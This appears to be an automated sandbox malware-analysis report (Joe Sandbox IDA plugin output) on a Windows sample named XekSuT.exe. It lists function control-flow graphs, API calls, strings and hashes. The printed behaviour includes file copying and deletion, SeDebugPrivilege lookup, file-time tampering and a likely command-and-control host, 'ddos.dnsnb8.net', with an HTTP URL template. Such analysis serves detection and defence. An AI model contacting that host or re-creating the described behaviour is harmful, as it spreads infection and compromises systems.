                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
                                                                                                                • String ID: .@<$5@<$<@<$C@<$m@<
                                                                                                                • API String ID: 3043204753-572888031
                                                                                                                • Opcode ID: fcc5dbd23ea996420a79f068dc3c42d4282c5d6a03c705eec8f19165649a05cf
                                                                                                                • Instruction ID: 441f02c0f2423a8c4ceb9ed5c5edb0398dc4c658029ee33becba7b0afd4a8a38
                                                                                                                • Opcode Fuzzy Hash: fcc5dbd23ea996420a79f068dc3c42d4282c5d6a03c705eec8f19165649a05cf
                                                                                                                • Instruction Fuzzy Hash: 1FF12875900218AFCB22DFA4D885EAEBBB5FF08314F10852EE50AEB661D730AD51CF54
                                                                                                                Function 003C1973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144filesleepmemoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 117 3c1973-3c199a PathFileExistsA 118 3c1ac7-3c1acc 117->118 119 3c19a0-3c19aa 117->119 120 3c1ace 118->120 121 3c1ad0-3c1ad5 118->121 122 3c19af-3c19c2 CreateFileA 119->122 120->121 123 3c1ad7-3c1ad9 121->123 124 3c1af0-3c1af6 121->124 125 3c1a28-3c1a36 GetFileSize 122->125 126 3c19c4-3c19d3 Sleep 122->126 123->124 127 3c1a38-3c1a3b 125->127 128 3c1a87-3c1a8b 125->128 126->122 129 3c19d5-3c1a0b call 3c185b wsprintfA CopyFileA 126->129 127->128 130 3c1a3d-3c1a51 VirtualAlloc 127->130 131 3c1a8d-3c1a90 CloseHandle 128->131 132 3c1a96-3c1a9a 128->132 129->125 143 3c1a0d-3c1a26 CreateFileA 129->143 130->128 134 3c1a53-3c1a57 130->134 131->132 135 3c1a9c 132->135 136 3c1aad-3c1ab1 132->136 138 3c1a59-3c1a6d ReadFile 134->138 139 3c1a80 134->139 140 3c1aa0-3c1aa7 DeleteFileA 135->140 141 3c1adb-3c1ae0 136->141 142 3c1ab3-3c1ab6 136->142 138->128 145 3c1a6f-3c1a7e 138->145 139->128 140->136 146 3c1ae7-3c1aec 141->146 147 3c1ae2-3c1ae5 141->147 142->118 148 3c1ab8-3c1ac1 VirtualFree 142->148 143->125 144 3c1a9e 143->144 144->140 145->138 145->139 146->124 149 3c1aee 146->149 147->146 148->118 149->124
                                                                                                                APIs
                                                                                                                • PathFileExistsA.SHLWAPI(\N<`N<,00000000,C:\Users\user\AppData\Local\Temp\XekSuT.exe), ref: 003C1992
                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003C19BA
                                                                                                                • Sleep.KERNEL32(00000064), ref: 003C19C6
                                                                                                                • wsprintfA.USER32 ref: 003C19EC
                                                                                                                • CopyFileA.KERNEL32(?,?,00000000), ref: 003C1A00
                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C1A1E
                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 003C1A2C
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 003C1A46
                                                                                                                • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 003C1A65
                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 003C1A90
                                                                                                                • DeleteFileA.KERNEL32(?), ref: 003C1AA7
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003C1AC1
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 003C19DB
                                                                                                                • C:\Users\user\AppData\Local\Temp\XekSuT.exe, xrefs: 003C197C
                                                                                                                • \N<`N<, xrefs: 003C1980
                                                                                                                • %s%.8X.data, xrefs: 003C19E6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
                                                                                                                • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XekSuT.exe$\N<`N<
                                                                                                                • API String ID: 716042067-2382788371
                                                                                                                • Opcode ID: 49e32dd09ef4940f743bf950e07731fe0d7d062bc0c454f80c6d0ee41cfe0e7f
                                                                                                                • Instruction ID: ffcae3967c11e4d1c196c111dd6c44d68304c92bffb2c811937a0f9c65e5269b
                                                                                                                • Opcode Fuzzy Hash: 49e32dd09ef4940f743bf950e07731fe0d7d062bc0c454f80c6d0ee41cfe0e7f
                                                                                                                • Instruction Fuzzy Hash: 8F518C76900219EFDB229FA8CC84EAEBBBCFB06354F10456DF516E6191C3709E40DBA0
                                                                                                                Function 003C28B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100stringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 150 3c28b8-3c28ff memset wsprintfA 151 3c29db-3c29df 150->151 152 3c2905-3c290d 150->152 152->151 153 3c2913-3c2919 152->153 154 3c291b-3c294c memset wsprintfA call 3c29e2 153->154 155 3c2956-3c2965 strrchr 153->155 158 3c2951 154->158 155->151 157 3c2967-3c2978 lstrcmpiA 155->157 159 3c2988-3c2992 lstrcmpiA 157->159 160 3c297a-3c2981 call 3c1e6e 157->160 158->151 159->151 162 3c2994-3c299b 159->162 163 3c2986 160->163 164 3c29ad-3c29c9 strstr 162->164 165 3c299d-3c29a3 162->165 163->151 167 3c29cb-3c29d1 call 3c239d 164->167 168 3c29d3-3c29d6 call 3c2692 164->168 165->164 166 3c29a5-3c29a7 lstrcpy 165->166 166->164 167->151 168->151
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 003C28D3
                                                                                                                • wsprintfA.USER32 ref: 003C28F7
                                                                                                                • memset.MSVCRT ref: 003C2925
                                                                                                                • wsprintfA.USER32 ref: 003C2940
                                                                                                                  • Part of subcall function 003C29E2: memset.MSVCRT ref: 003C2A02
                                                                                                                  • Part of subcall function 003C29E2: wsprintfA.USER32 ref: 003C2A1A
                                                                                                                  • Part of subcall function 003C29E2: memset.MSVCRT ref: 003C2A44
                                                                                                                  • Part of subcall function 003C29E2: lstrlen.KERNEL32(?), ref: 003C2A54
                                                                                                                  • Part of subcall function 003C29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 003C2A6C
                                                                                                                  • Part of subcall function 003C29E2: strrchr.MSVCRT ref: 003C2A7C
                                                                                                                  • Part of subcall function 003C29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 003C2A9F
                                                                                                                  • Part of subcall function 003C29E2: lstrlen.KERNEL32(Documents and Settings), ref: 003C2AAE
                                                                                                                  • Part of subcall function 003C29E2: memset.MSVCRT ref: 003C2AC6
                                                                                                                  • Part of subcall function 003C29E2: memset.MSVCRT ref: 003C2ADA
                                                                                                                  • Part of subcall function 003C29E2: FindFirstFileA.KERNEL32(?,?), ref: 003C2AEF
                                                                                                                  • Part of subcall function 003C29E2: memset.MSVCRT ref: 003C2B13
                                                                                                                • strrchr.MSVCRT ref: 003C2959
                                                                                                                • lstrcmpiA.KERNEL32(00000001,exe), ref: 003C2974
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                                                                                                • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                                                                                                • API String ID: 3004273771-3007274656
                                                                                                                • Opcode ID: ac7731c78733de249e3117d5fc4aa09da67d9c5b5b88d8a1847f10e983c3cc0a
                                                                                                                • Instruction ID: 268be7f06f6f55d686bd06d44ce1876c6ed750d19c284def6d29b9bdb3f7f90c
                                                                                                                • Opcode Fuzzy Hash: ac7731c78733de249e3117d5fc4aa09da67d9c5b5b88d8a1847f10e983c3cc0a
                                                                                                                • Instruction Fuzzy Hash: B231F47690031C7BDB22ABA4DC89FCB376CAF11310F05485AF585E6080E7B4EED48BA0
                                                                                                                Function 003C1638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70stringsynchronizationthreadCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 003C164F
                                                                                                                • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 003C165B
                                                                                                                • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\XekSuT.exe,00000104), ref: 003C166E
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,003C1099,00000000,00000000,00000000), ref: 003C16AC
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 003C16BD
                                                                                                                  • Part of subcall function 003C139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XekSuT.exe), ref: 003C13BC
                                                                                                                  • Part of subcall function 003C139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 003C13DA
                                                                                                                  • Part of subcall function 003C139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 003C1448
                                                                                                                • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\XekSuT.exe), ref: 003C16E5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XekSuT.exe$C:\Windows\system32$Documents and Settings
                                                                                                                • API String ID: 123563730-3137646543
                                                                                                                • Opcode ID: f521d40fe576735e0893b3970191a1ebc7bcc436cac9cb39ba913cb7b8a055e6
                                                                                                                • Instruction ID: d6c56e060305aa484897a39ba92f621994c25277864edc337473c06e0de59bbe
                                                                                                                • Opcode Fuzzy Hash: f521d40fe576735e0893b3970191a1ebc7bcc436cac9cb39ba913cb7b8a055e6
                                                                                                                • Instruction Fuzzy Hash: 9011D073500224BBCB236BA0AD4EFEB3E6DEB03361F004018F20AD50A2C6719D50EBA1
                                                                                                                Function 003C1000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 205 3c1000-3c1023 CreateFileA 206 3c1025-3c1055 GetFileSize CreateFileMappingA MapViewOfFile 205->206 207 3c1092-3c1096 205->207 208 3c107b-3c1085 206->208 209 3c1057-3c105f 206->209 210 3c108d-3c1091 CloseHandle 208->210 211 3c1087-3c108b CloseHandle 208->211 212 3c1074-3c1075 UnmapViewOfFile 209->212 213 3c1061-3c106e call 3c17d0 209->213 210->207 211->210 212->208 213->212
                                                                                                                APIs
                                                                                                                • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG<,http://%s:%d/%s/%s,003C10E8,?), ref: 003C1018
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75BF8400), ref: 003C1029
                                                                                                                • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 003C1038
                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 003C104B
                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 003C1075
                                                                                                                • CloseHandle.KERNEL32(?), ref: 003C108B
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 003C108E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                                                                                                • String ID: HG<$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                                                • API String ID: 1223616889-3593622639
                                                                                                                • Opcode ID: b6b3ad7f86a71f7b7c4934247a963e9c3d4b07f1274ac140bc2e82cc9a8d9f46
                                                                                                                • Instruction ID: b901b843380179819b99d04d24cf0600fa7b6a028d6af4d23a75f688dd9b0caa
                                                                                                                • Opcode Fuzzy Hash: b6b3ad7f86a71f7b7c4934247a963e9c3d4b07f1274ac140bc2e82cc9a8d9f46
                                                                                                                • Instruction Fuzzy Hash: E9019BB210036CBFE7316F609C88F2B7BACEB44799F014529F245E2091D6706E449B71
                                                                                                                Function 003C2C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 371 3c2c48-3c2c75 memset call 3c1973 374 3c2c77-3c2c7f 371->374 375 3c2cb2-3c2cb9 371->375 376 3c2c8f-3c2cac CreateThread WaitForMultipleObjects 374->376 377 3c2c81-3c2c8b 374->377 378 3c2cc8-3c2ccc 375->378 379 3c2cbb-3c2cc2 VirtualFree 375->379 376->375 377->376 379->378
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 003C2C57
                                                                                                                  • Part of subcall function 003C1973: PathFileExistsA.SHLWAPI(\N<`N<,00000000,C:\Users\user\AppData\Local\Temp\XekSuT.exe), ref: 003C1992
                                                                                                                  • Part of subcall function 003C1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003C19BA
                                                                                                                  • Part of subcall function 003C1973: Sleep.KERNEL32(00000064), ref: 003C19C6
                                                                                                                  • Part of subcall function 003C1973: wsprintfA.USER32 ref: 003C19EC
                                                                                                                  • Part of subcall function 003C1973: CopyFileA.KERNEL32(?,?,00000000), ref: 003C1A00
                                                                                                                  • Part of subcall function 003C1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C1A1E
                                                                                                                  • Part of subcall function 003C1973: GetFileSize.KERNEL32(?,00000000), ref: 003C1A2C
                                                                                                                  • Part of subcall function 003C1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 003C1A46
                                                                                                                  • Part of subcall function 003C1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 003C1A65
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 003C2C99
                                                                                                                • WaitForMultipleObjects.KERNEL32(00000001,003C16BA,00000001,000000FF,?,003C16BA,00000000), ref: 003C2CAC
                                                                                                                • VirtualFree.KERNEL32(013A0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\XekSuT.exe,003C4E5C,003C4E60,?,003C16BA,00000000), ref: 003C2CC2
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\XekSuT.exe, xrefs: 003C2C69
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                                • API String ID: 2042498389-472551747
                                                                                                                • Opcode ID: d49a49f8d785bc09b0cbf0b4d2830d282d7de241ae7472f9c8e2b7b9f98605ec
                                                                                                                • Instruction ID: 5704da6535dc017d361bed997a7f9d634971eb5aba8d880974a074fce6d7bf37
                                                                                                                • Opcode Fuzzy Hash: d49a49f8d785bc09b0cbf0b4d2830d282d7de241ae7472f9c8e2b7b9f98605ec
                                                                                                                • Instruction Fuzzy Hash: 9C018F726412247AD712ABA59C5AFEF7E6CEF01B60F118119F905D61C1DAA0AE40C7E0
                                                                                                                Function 003C14E1 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 380 3c14e1-3c14fb 381 3c14fd-3c1510 GetModuleHandleA 380->381 382 3c1541-3c1547 380->382 383 3c151a-3c1535 VirtualQuery 381->383 384 3c1512-3c1518 381->384 385 3c1549-3c154c 382->385 386 3c1573-3c1574 call 3c1638 382->386 388 3c153b 383->388 389 3c1537-3c1539 383->389 384->382 390 3c154e-3c1555 385->390 391 3c1569-3c1570 385->391 392 3c1579-3c157a ExitProcess 386->392 388->382 389->382 389->388 390->391 393 3c1557-3c1566 call 3c1af9 390->393 393->391
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 003C1504
                                                                                                                • VirtualQuery.KERNEL32(003C14E1,?,0000001C), ref: 003C1525
                                                                                                                • ExitProcess.KERNEL32 ref: 003C157A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExitHandleModuleProcessQueryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 3946701194-0
                                                                                                                • Opcode ID: ef30796cc0a4834d2dc71aa77b9fc9577f356b194cad039f36d264b2a740cf1c
                                                                                                                • Instruction ID: 24414804646e0a779751f4b66de769b9e8cfd7db77386f45ff74ccc13b5cb305
                                                                                                                • Opcode Fuzzy Hash: ef30796cc0a4834d2dc71aa77b9fc9577f356b194cad039f36d264b2a740cf1c
                                                                                                                • Instruction Fuzzy Hash: 79115172900214DFCB13EF65A898F7977BCEB86711F11402EF403D6262D230AD41BB90
                                                                                                                Function 003C1915 Relevance: 4.5, APIs: 3, Instructions: 41timeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 396 3c1915-3c1922 397 3c1928-3c192c 396->397 398 3c1924-3c1926 396->398 400 3c192e-3c194d memset GetFileTime 397->400 401 3c194f-3c1952 397->401 399 3c196e-3c1970 398->399 402 3c1966-3c1968 400->402 401->399 403 3c1954-3c1960 SetFileTime 401->403 404 3c196c 402->404 405 3c196a 402->405 403->402 404->399 405->404
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileTimememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 176422537-0
                                                                                                                • Opcode ID: 5bc7f1a06c99814d281421db399a5c592e2ab2388903f37030b47968d97ce067
                                                                                                                • Instruction ID: 40c867de423dcdbe0f336e64c570ff2c779afa1bf35a8100f885a6a91b89933f
                                                                                                                • Opcode Fuzzy Hash: 5bc7f1a06c99814d281421db399a5c592e2ab2388903f37030b47968d97ce067
                                                                                                                • Instruction Fuzzy Hash: 8DF04F32200209ABDB629E26DC04FAB77ACAB51761F01853EF516D5491E730EA49ABE0
                                                                                                                Function 003C6158 Relevance: 2.6, APIs: 2, Instructions: 59memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 406 3c6158-3c615d 407 3c615f-3c6189 VirtualFree 406->407 408 3c618c-3c6192 407->408 409 3c6198-3c61b0 VirtualFree 408->409 410 3c60c7-3c60cf 408->410 411 3c61ba-3c61c8 409->411 412 3c61b2-3c61b4 409->412 410->408 413 3c60d5-3c60f8 VirtualAlloc 410->413 415 3c61ca-3c61d7 411->415 416 3c6243-3c6251 411->416 412->411 431 3c60fe-3c6106 413->431 432 3c60fa-3c60fc call 3c66c8 413->432 420 3c61dd-3c61e0 415->420 418 3c6264-3c626f 416->418 419 3c6253 416->419 423 3c6271-3c6276 418->423 422 3c6255-3c6258 419->422 420->416 424 3c61e2-3c61f2 420->424 422->418 426 3c625a-3c6262 422->426 427 3c627c-3c6289 423->427 428 3c6389-3c63b1 VirtualProtect 423->428 429 3c61f5-3c61fe 424->429 426->422 448 3c628b 427->448 449 3c6292-3c6298 427->449 430 3c63b7-3c63ba 428->430 433 3c620c-3c6219 429->433 434 3c6200-3c6203 429->434 436 3c63fc-3c6416 VirtualProtect 430->436 437 3c63bc-3c63c2 430->437 439 3c6108-3c611d 431->439 440 3c6155 431->440 432->431 435 3c6238-3c623f 433->435 442 3c621b-3c6228 434->442 443 3c6205-3c6208 434->443 435->429 445 3c6241 435->445 453 3c6418-3c641d 436->453 454 3c6420-3c6425 436->454 437->437 444 3c63c4 437->444 446 3c611f-3c6121 439->446 440->407 442->435 450 3c622a-3c6236 443->450 451 3c620a 443->451 444->436 455 3c63c6-3c63cf 444->455 445->420 456 3c6151-3c6154 446->456 457 3c6123 446->457 448->449 452 3c62a2-3c62ac 449->452 450->435 451->435 458 3c62ae 452->458 459 3c62b1-3c62c8 452->459 460 3c63d4-3c63d8 455->460 461 3c63d1 455->461 456->440 457->456 462 3c6125-3c6128 457->462 458->459 463 3c62ce-3c62d4 459->463 464 3c6373-3c6384 459->464 465 3c63dd-3c63e1 460->465 466 3c63da 460->466 461->460 467 3c612a-3c612e 462->467 468 3c6134-3c613b 462->468 469 3c62da-3c62f1 463->469 470 3c62d6-3c62d9 463->470 464->423 471 3c63e7-3c63fa VirtualProtect 465->471 472 3c63e3 465->472 466->465 467->468 476 3c6130-3c6132 467->476 475 3c613d-3c614f 468->475 468->476 478 3c6365-3c636e 469->478 479 3c62f3-3c62f9 469->479 470->469 471->430 471->436 472->471 475->446 476->446 478->452 480 3c62fb-3c630f 479->480 481 3c6314-3c6326 479->481 482 3c6426-3c64c0 480->482 483 3c634c-3c6360 481->483 484 3c6328-3c634a 481->484 493 3c6535-3c6537 482->493 494 3c64c2 482->494 483->482 484->478 495 3c6539 493->495 496 3c659a 493->496 497 3c64f8 494->497 498 3c64c5-3c64cd 494->498 501 3c653b-3c6541 495->501 502 3c65b4 495->502 503 3c659b-3c659d 496->503 499 3c656c-3c656f 497->499 500 3c64fa-3c64fe 497->500 504 3c64cf-3c64d4 498->504 505 3c6542-3c6545 498->505 509 3c6572 499->509 500->509 510 3c6500 500->510 501->505 508 3c65be-3c6608 502->508 511 3c659f 503->511 512 3c6591-3c6593 503->512 506 3c64d6-3c64d9 504->506 507 3c6517-3c651c 504->507 513 3c654d-3c6550 505->513 506->513 516 3c64db-3c64f5 506->516 520 3c651d-3c651e 507->520 521 3c6583-3c6587 507->521 517 3c6573-3c6576 509->517 518 3c6522-3c6533 510->518 519 3c6502 510->519 514 3c6588-3c658b 511->514 512->503 522 3c6595 512->522 513->508 515 3c6552-3c6556 513->515 526 3c658d-3c658f 514->526 527 3c65a1-3c65a3 514->527 523 3c6578-3c657f 515->523 524 3c6558-3c6569 515->524 516->497 517->523 518->493 519->517 525 3c6504-3c6513 519->525 520->518 521->514 522->496 523->521 524->499 525->493 529 3c6515 525->529 526->512 529->507
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 003C60DF
                                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 003C6189
                                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 003C61A5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$Free$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1852963964-0
                                                                                                                • Opcode ID: 48ba39f76e1a590c558f6182c4e46f6470678108b7c66a1ec93a7b1812be8fd1
                                                                                                                • Instruction ID: 462e4e8892b64bd51e057223b5ad1234bf9ffa50357326fe54c364a209020eed
                                                                                                                • Opcode Fuzzy Hash: 48ba39f76e1a590c558f6182c4e46f6470678108b7c66a1ec93a7b1812be8fd1
                                                                                                                • Instruction Fuzzy Hash: 61215E31604659CFCF328F58CC92BED37A2EF45301F6A481DDE899B291DA716D40CB94

                                                                                                                Non-executed Functions

